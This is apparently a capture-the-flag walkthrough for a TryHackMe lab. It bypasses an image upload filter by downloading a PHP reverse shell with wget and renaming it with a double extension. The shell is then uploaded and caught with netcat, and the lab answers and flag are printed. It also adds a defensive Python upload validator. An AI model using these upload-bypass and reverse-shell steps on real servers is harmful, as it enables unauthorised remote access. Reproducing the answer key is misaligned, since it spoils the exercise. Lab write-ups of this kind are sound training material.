# The Elf Strikes Back!

## Video

{% embed url="https://www.youtube.com/watch?v=F_nTIX-q32k" %}

## Rooms

[Upload vulns](https://tryhackme.com/room/uploadvulns)

[Intro to Shells](https://tryhackme.com/room/introtoshells)

## Resources

[PHP Reverse Shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)

## Challenge

Open the site

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMRpLkhBRp7BZjInRi%2Fimage.png?alt=media\&token=40ec2c9a-a27b-4991-8e77-644be5dbac09)

> You have been assigned an ID number for your audit of the system: **`ODIzODI5MTNiYmYw`**
>
> <http://10.10.236.79/?id=ODIzODI5MTNiYmYw>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMSYtSzXe2UihmY4nd%2Fimage.png?alt=media\&token=f2a6d42f-9e3e-463b-9c0d-eca52389f865)

### What string of text needs adding to the URL to get access to the upload page?

{% hint style="success" %}
?id=ODIzODI5MTNiYmYw
{% endhint %}

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMSjoFy5oErEbydTPI%2Fimage.png?alt=media\&token=eafb63c6-b081-40c2-82c3-a39b80482b4f)

### What type of file is accepted by the site?

{% hint style="success" %}
Image
{% endhint %}

Bypass the filter and upload a reverse shell.

```
# download the PentestMonkey PHP reverse shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

# give it a double extension: the upload filter sees an image-looking name, the server still treats it as PHP
mv php-reverse-shell.php image.jpeg.php
```
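The rename above only works because the site's filter does not judge the file by its final extension and its actual bytes. As an added example (not code from the writeup or from TryHackMe), here is the server-side check a developer would want in the upload handler: allowlist the last extension only, verify the magic bytes match the declared type, and never reuse the client's filename on disk. The allowlist, the sample files and the function names are constructed for this illustration.

```python
"""Added example: server-side upload validation that rejects 'image.jpeg.php'.

Assumptions (not from the page): the site wants to accept JPEG/PNG/GIF only,
and decides on the LAST extension plus the file's leading bytes.
"""
import os
import secrets
from typing import Dict, Tuple

# Constructed allowlist: final extension -> accepted magic-byte prefixes
ALLOWED: Dict[str, Tuple[bytes, ...]] = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason).

    Only the last extension is considered, so 'image.jpeg.php' is judged
    by 'php' and rejected, regardless of the 'jpeg' in the middle.
    """
    base = os.path.basename(filename)
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    # The declared type must match the content: a PHP file renamed to .jpg
    # does not start with JPEG magic bytes.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match declared image type"
    return True, "ok"


def safe_storage_name(filename: str) -> str:
    """Server-generated name: random hex plus the (already allowlisted) extension,
    so the client never controls the path or the name written to disk."""
    ext = os.path.basename(filename).rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs for a quick demonstration
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16   # minimal JPEG-looking header
PHP_SAMPLE = b"<?php echo 1; ?>"                   # PHP source, not an image


def demo() -> Dict[str, bool]:
    """Run the validator over the three cases a reviewer would ask about."""
    return {
        "photo.jpg (real JPEG bytes)": validate_upload("photo.jpg", JPEG_SAMPLE)[0],
        "image.jpeg.php (double extension)": validate_upload("image.jpeg.php", PHP_SAMPLE)[0],
        "shell.jpg (PHP bytes, image name)": validate_upload("shell.jpg", PHP_SAMPLE)[0],
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case}: {'accepted' if accepted else 'rejected'}")
```

The validator is necessary but not sufficient: the upload directory should also be served without any script handler (or kept outside the web root entirely), so that even a file that slips through is returned as static bytes rather than executed.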

Change the following parameters in the file so the shell connects back to your listener:

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMUEf1kFCNVWECPdUZ%2Fimage.png?alt=media\&token=fa4847e2-c240-4d77-881a-a63b07bb8779)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMVJTEuYuZVd4Csdln%2Fimage.png?alt=media\&token=2accec1d-09f0-4b8a-ad4c-31ac3cd0963e)

Tried /uploads, /images, /media and /resources.

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMVU1UW41r81465UY2%2Fimage.png?alt=media\&token=6d3e8cda-6a83-4042-8ded-c0d2a119ea74)

### In which directory are the uploaded files stored?

{% hint style="success" %}
/uploads/
{% endhint %}

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMVr7Y3Hv_DqLm_D0P%2Fimage.png?alt=media\&token=a6a9aa45-5ec4-43d2-bd7b-4cb069183695)

### Activate your reverse shell and catch it in a netcat listener!

{% hint style="success" %}
No answer needed
{% endhint %}

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMWFe71v3vuNPFxJcm%2Fimage.png?alt=media\&token=1a9d808b-9e73-480e-a965-049d43da4fc5)

### What is the flag in /var/www/flag.txt?

{% hint style="success" %}
THM{MGU3Y2UyMGUwNjExYTY4NTAxOWJhMzhh}
{% endhint %}
